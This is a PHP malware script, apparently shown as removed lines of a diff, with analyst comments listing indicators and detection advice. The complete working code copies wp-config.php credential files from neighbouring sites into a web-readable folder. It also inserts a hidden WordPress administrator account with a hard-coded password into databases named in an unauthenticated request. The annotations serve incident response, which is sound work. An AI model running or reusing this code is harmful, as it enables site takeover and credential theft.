- <?php
// Runtime setup: turn off all PHP error reporting, remove the execution time limit
// and request a 256M memory limit (the @ hides a failure of ini_set itself).
// NOTE(review): error suppression plus an unlimited run time at the top of an
// unfamiliar PHP file in a web root is a useful triage signal; application code
// rarely needs both.
- error_reporting(0);
- set_time_limit(0);
- @ini_set('memory_limit','256M');
// query(): writes a new user row and administrator-level usermeta rows directly
// into a WordPress database, without going through WordPress itself.
//   $connect - open mysqli connection to the target database
//   $prefix  - table prefix; concatenated unescaped into every statement below
//   $user    - login name, reused for user_nicename and display_name
// Output: one CSV line "<siteurl>/wp-login.php,<user>,<password>" when the siteurl
// lookup, the users insert and the first two usermeta inserts all returned truthy.
// Returns nothing.
//
// Indicators a defender can search for in <prefix>users / <prefix>usermeta, all taken
// from the literals below: user_pass 'b69d8af222106f687d7a086c24232387',
// user_email 'support@wordpress.org', user_registered '2011-06-07 00:00:00',
// an ID between 80 and 600, and capabilities/user_level meta rows for that ID.
- function query($connect, $prefix, $user) {
- try{
// Row ID is picked at random in 80..600; nothing here checks whether it is already taken.
- $id = rand(80, 600);
// Look up the site's URL so it can be reported back to the operator.
- $query1 = mysqli_query($connect, "SELECT * FROM " . $prefix . "options where option_name='siteurl'");
- while ($siteurl = mysqli_fetch_array($query1)) {
- $site_url = $siteurl['option_value'];
- }
// The user row carries a fixed 32-hex-character user_pass value (the shape of an
// unsalted MD5 digest), a fixed e-mail address and a back-dated registration time.
- $query2 = mysqli_query($connect, "INSERT INTO " . $prefix . "users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES ( " . $id . ", '" . $user . "','b69d8af222106f687d7a086c24232387','" . $user . "','support@wordpress.org','','2011-06-07 00:00:00','','0','" . $user . "');");
// Capability and level rows are written twice: once under the literal 'wp_' meta keys
// and once under keys built from $prefix, so either naming is covered.
- $sql1 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}');");
- $sql2 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'wp_user_level','10');");
- $sql3 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'" . $prefix . "capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}');");
- $sql4 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (user_id,meta_key,meta_value) VALUES (" . $id . ",'" . $prefix . "user_level','10');");
// Only the first four results are tested; $sql3 and $sql4 do not affect the report.
- if ($query1 && $query2 && $sql1 && $sql2) {
// NOTE(review): the password printed here is a hard-coded string; presumably it is the
// plaintext matching the stored user_pass value - not verifiable from this page.
- echo "$site_url/wp-login.php," . $user . ",StrongPass154$$\n";
- }
- // else{
- // echo $site_url;
- // }
- }catch (Exception $e){
// Any exception is discarded, so a failed target leaves no trace in the output.
- // do nothing... php will ignore and continue
- }
- }
// Request handler for the "change" mode: runs when the request has a `change` query
// parameter. The POST field `config` is read as newline-separated records of the form
// host,user,pass,name,prefix (database host, credentials, schema name, table prefix).
// For each record the script connects to that database and, unless a marker account
// already exists, calls query() to insert one. The script then exits.
//
// NOTE(review): nothing in this block authenticates the caller; whoever can reach the
// file over HTTP can drive it. Detection angles grounded in this code: POST requests
// carrying `change` in the query string to an unexpected PHP file, and MySQL
// connections opened from the web server to hosts supplied in the request body.
- if (isset($_GET['change'])) {
- $lines = explode("\n", $_POST['config']);
- foreach ($lines as $line) {
- try{
// Fields are taken by position; a short or malformed line is not validated here.
- $data = explode(',', $line);
- $host = $data[0];
- $user = $data[1];
- $pass = $data[2];
- $name = $data[3];
- $prefix = $data[4];
- // echo $host .' '. $user .' '. $pass .' '. $name;
- $connect = mysqli_connect($host, $user, $pass, $name);
- if ($connect) {
// Marker check: is there already a user named 'Administrator' or 'Wpadmin' whose
// user_pass is one of two fixed values (the 32-hex value used by query(), or a
// '$P$'-prefixed phpass-style hash)? These four literals are searchable indicators.
- $check_availability = mysqli_query($connect, "SELECT * FROM " . $prefix . "users WHERE (user_login = 'Administrator' OR user_login = 'Wpadmin') AND (user_pass = 'b69d8af222106f687d7a086c24232387' OR user_pass = '\$P\$B/BHu2715erD4cr2tF0p5QXanN6PqS1');");
// No matching row: insert the account under the login name 'Administrator'.
- if (mysqli_num_rows($check_availability) < 1) {
- query($connect, $prefix, 'Administrator');
- }
- mysqli_close($connect);
- }
- }catch (Exception $e){
- // do nothing... php will ignore and continue
- }
- }
// Stop here so the filesystem walk at the bottom of the file does not run in this mode.
- die();
- }
// file_get_contents_utf8(): reads the file at $fn and returns its contents converted
// to UTF-8. The source encoding is detected in strict mode from the candidates
// UTF-8 and ISO-8859-1. The result of file_get_contents() is not checked before use.
- function file_get_contents_utf8($fn) {
- $content = file_get_contents($fn);
- return mb_convert_encoding($content, 'UTF-8',
- mb_detect_encoding($content, 'UTF-8, ISO-8859-1', true));
- }
// save(): opens $filename with fopen mode $mode, writes the string $file to it and
// closes the handle. Returns nothing. The fopen() result is not checked.
- function save($filename, $mode, $file) {
- $handle = fopen($filename, $mode);
- fwrite($handle, $file);
- fclose($handle);
- return;
- }
// go(): walks the directory tree under $m_dir . $p and copies every readable file
// named wp-config.php into a local wp_dir/ directory as Wordpress-<n>.txt.
//   $m_dir - base directory (the caller passes the normalised document root)
//   $p     - relative suffix appended to $m_dir: '../../', '../' or ''
// Output: the name of each copy written, one per line, followed by the fixed marker
// string "aofhnjkq198a" when at least one file was copied.
//
// Artifacts for incident response, all taken from the literals below: a wp_dir/
// directory relative to the script's working directory, a .htaccess inside it with
// "Options all", "DirectoryIndex doesntexist.htm" and "Satisfy Any", and files named
// Wordpress-<n>.txt. wp-config.php holds the site's database credentials and
// authentication keys, so any site whose file was copied needs those rotated.
- function go($m_dir, $p) {
- global $script;
// Create the drop directory; the @ hides the warning when it already exists.
- @mkdir('wp_dir', 0755);
// NOTE(review): these directives presumably aim to make the drop directory readable
// over HTTP regardless of the parent configuration - confirm against the server's
// Apache version and AllowOverride settings.
- $htaccess = "Options all\nDirectoryIndex doesntexist.htm\nSatisfy Any";
- save("wp_dir/.htaccess","w", $htaccess);
// The deeper the walk starts above $m_dir, the larger the depth limit, which keeps
// the reach below $m_dir roughly the same in all three cases.
- if ($p == '../../') {
- $depth = 6;
- }elseif ($p == '../') {
- $depth = 5;
- }else {
- $depth = 4;
- }
- $dir = new RecursiveDirectoryIterator($m_dir . $p, RecursiveDirectoryIterator::SKIP_DOTS);
- $iterator = new RecursiveIteratorIterator($dir);
- $iterator->setMaxDepth($depth);
// $n counts every entry visited, not only matches, so the numbers in the copied
// file names are not contiguous.
- $n = 0;
- foreach ($iterator as $file) {
- // echo $file . PHP_EOL;
- $n += 1;
- if ($file->getBaseName() == 'wp-config.php') {
- if (is_readable($file)) {
- $file_data = file_get_contents_utf8($file);
// $p is reused here as the output file name, overwriting the path-suffix argument.
- $p = "Wordpress-$n.txt";
- echo $p . PHP_EOL;
// The handle opened here is not closed explicitly in this function.
- $fopen = fopen("wp_dir/$p", "w");
- fputs($fopen, $file_data);
- $flag = true;
- }
- }
- }
// $flag is only assigned inside the loop when a config file was copied.
- if ($flag) {
- echo "aofhnjkq198a";
- }
- }
// Default mode (no `change` parameter): normalise DOCUMENT_ROOT to forward slashes
// with a trailing '/', then start the wp-config.php walk from the highest readable
// ancestor: two levels above the document root, else one level above, else the
// document root itself.
// NOTE(review): starting above the document root presumably lets the walk reach
// other sites hosted under the same account or parent directory. Whether it can
// depends on what the PHP process is allowed to read; an open_basedir restriction,
// per-site system users and tight file permissions on wp-config.php are the
// controls that bound it.
- $doc_r = str_replace("//", "/", str_replace("\\", "/", $_SERVER['DOCUMENT_ROOT'])).'/';
- if (is_readable($doc_r . '../../')) {
- go($doc_r, '../../');
- }elseif (is_readable($doc_r . '../')) {
- go($doc_r, '../');
- }else{
- go($doc_r, '');
- }
- ?>